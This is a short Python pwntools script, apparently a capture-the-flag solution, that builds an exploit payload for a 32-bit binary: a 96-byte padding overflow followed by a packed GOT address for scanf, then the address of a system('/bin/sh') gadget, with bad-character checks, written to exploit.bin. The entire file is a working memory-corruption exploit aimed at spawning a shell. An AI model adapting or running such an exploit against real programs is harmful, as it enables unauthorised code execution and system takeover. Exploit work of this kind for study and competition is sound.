from pwn import *

got_base_addr = 0x08049ff0
got_scanf_addr = 0x08049ff0
system_bin_sh_addr = 0x080485e3

# Offset

exploit = ""
exploit += "A" * (100 - 4)
exploit += p32(got_scanf_addr)

exploit += "\n"
exploit += str(system_bin_sh_addr)
exploit += "\n"
exploit += "420133769" # ignored garbage
exploit += "\n"

# Check for no bad chars

assert "\0" not in exploit
assert " " not in exploit
assert "\r" not in exploit
assert "\t" not in exploit
assert exploit.count("\n") == 3

with open("exploit.bin", "wb") as f:
    f.write(exploit)
